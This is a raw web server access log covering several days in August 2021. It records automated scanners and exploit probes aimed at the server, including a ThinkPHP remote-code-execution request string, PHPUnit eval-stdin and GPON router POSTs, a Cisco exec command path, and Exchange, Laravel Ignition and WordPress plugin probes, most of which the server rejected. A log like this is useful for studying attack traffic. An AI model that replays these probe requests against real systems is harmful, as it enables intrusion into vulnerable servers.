"/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:10:32:28 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:13:36:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 27.115.124.75] [Length 0] [Gzip -] "-" "-" [01/Aug/2021:13:36:26 +0000] 400 - - https localhost "-" [Client 27.115.124.99] [Length 154] [Gzip -] "-" "-" [01/Aug/2021:13:36:27 +0000] 400 - - http localhost "-" [Client 27.115.124.10] [Length 154] [Gzip -] "-" "-" [01/Aug/2021:13:36:37 +0000] 400 - - https localhost "-" [Client 27.115.124.10] [Length 0] [Gzip -] "-" "-" [01/Aug/2021:13:36:38 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 27.115.124.100] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [01/Aug/2021:13:36:39 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 27.115.124.100] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [01/Aug/2021:13:36:39 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 27.115.124.99] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [01/Aug/2021:13:54:02 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 82.156.185.91] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [01/Aug/2021:13:54:17 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 82.156.185.91] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [01/Aug/2021:13:54:24 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 82.156.185.91] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [01/Aug/2021:13:55:22 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 82.156.185.91] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [01/Aug/2021:13:55:23 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 82.156.185.91] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [01/Aug/2021:13:55:24 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 82.156.185.91] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36" "-" [01/Aug/2021:14:48:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Aug/2021:15:17:20 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.202.128] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Aug/2021:17:03:57 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Aug/2021:17:03:57 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Aug/2021:17:03:57 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Aug/2021:17:03:57 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Aug/2021:17:03:57 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Aug/2021:17:03:57 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Aug/2021:19:49:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Aug/2021:21:07:05 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.211.201] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Aug/2021:21:19:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [01/Aug/2021:21:19:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [01/Aug/2021:21:41:34 +0000] 400 - GET http localhost "/" [Client 125.64.94.136] [Length 252] [Gzip -] "-" "-" [01/Aug/2021:21:41:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.136] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [01/Aug/2021:21:41:38 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 125.64.94.136] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [01/Aug/2021:21:41:40 +0000] 400 - GET http 64.22.31.253 "/robots.txt" [Client 125.64.94.136] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [01/Aug/2021:21:41:40 +0000] 400 - GET http 64.22.31.253 "/.well-known/security.txt" [Client 125.64.94.136] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [01/Aug/2021:22:01:12 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [01/Aug/2021:22:09:51 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:09:52 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:09:55 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:09:55 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:10:01 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:10:03 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [01/Aug/2021:22:10:05 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:10:06 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:10:06 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Aug/2021:22:52:41 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.38] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Aug/2021:01:51:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [02/Aug/2021:06:00:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.219.228] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Aug/2021:07:17:36 +0000] 444 - GET https 64.22.31.253 "/level/15/exec/-/sh/run/CR" [Client 94.102.49.198] [Length 0] [Gzip -] "libwww-perl/6.54" "-" [02/Aug/2021:07:37:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [02/Aug/2021:09:54:59 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.58] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Aug/2021:12:02:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.53] [Length 0] [Gzip -] "-" "-" [02/Aug/2021:12:02:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.53] [Length 252] [Gzip -] "-" "-" [02/Aug/2021:12:02:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.53] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Aug/2021:12:36:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [02/Aug/2021:12:36:59 +0000] 400 - GET https localhost "/" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" [02/Aug/2021:12:36:59 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [02/Aug/2021:12:36:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [02/Aug/2021:12:36:59 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [02/Aug/2021:12:37:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [02/Aug/2021:12:37:00 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [02/Aug/2021:12:37:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [02/Aug/2021:12:37:00 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [02/Aug/2021:12:37:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.8.10.202] [Length 0] [Gzip -] "fasthttp" "-" [02/Aug/2021:13:45:22 +0000] 400 - - http localhost "-" [Client 185.202.2.147] [Length 154] [Gzip -] "-" "-" [02/Aug/2021:15:10:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.53.170.243] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Aug/2021:16:33:55 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:33:55 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:33:56 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:33:58 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:34:00 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:34:00 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [02/Aug/2021:16:34:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:34:05 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:34:05 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:34:07 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:34:08 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Aug/2021:16:38:42 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.220.188] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Aug/2021:17:39:49 +0000] 400 - GET http localhost "/" [Client 46.101.26.187] [Length 252] [Gzip -] "-" "-" [02/Aug/2021:19:03:24 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.215.243] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Aug/2021:19:25:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [02/Aug/2021:19:28:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Aug/2021:19:40:03 +0000] 400 - - http localhost "-" [Client 45.83.64.105] [Length 154] [Gzip -] "-" "-" [02/Aug/2021:20:48:36 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Aug/2021:20:48:36 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Aug/2021:20:48:36 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Aug/2021:20:48:36 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Aug/2021:20:48:36 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Aug/2021:20:48:36 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Aug/2021:21:15:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Aug/2021:21:32:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [02/Aug/2021:22:34:01 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [02/Aug/2021:22:54:44 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.174] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Aug/2021:23:47:49 +0000] 400 - GET http localhost "/" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [03/Aug/2021:00:31:05 +0000] 400 - GET http localhost "/" [Client 206.189.142.201] [Length 252] [Gzip -] "-" "-" [03/Aug/2021:01:32:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Aug/2021:03:55:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [03/Aug/2021:06:00:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.215] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Aug/2021:06:43:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [03/Aug/2021:06:48:31 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.79] [Length 0] [Gzip -] "curl/7.3.2" "-" [03/Aug/2021:07:58:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Aug/2021:08:22:55 +0000] 400 - - http localhost "-" [Client 87.251.75.145] [Length 154] [Gzip -] "-" "-" [03/Aug/2021:09:17:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Aug/2021:09:57:47 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.217.124] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Aug/2021:10:50:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [03/Aug/2021:10:50:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 128.14.209.242] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [03/Aug/2021:11:31:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.175.196.163] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/54.0.3031.78 Safari/537.32" "-" [03/Aug/2021:11:31:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.175.196.163] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/54.0.3031.78 Safari/537.32" "-" [03/Aug/2021:12:27:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.71.9.209] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 OPR/47.0.2631.39" "-" [03/Aug/2021:13:50:13 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 208.110.85.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [03/Aug/2021:15:39:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Aug/2021:16:38:30 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Aug/2021:18:02:01 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:01 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:03 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:05 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:06 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:06 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:08 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:09 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 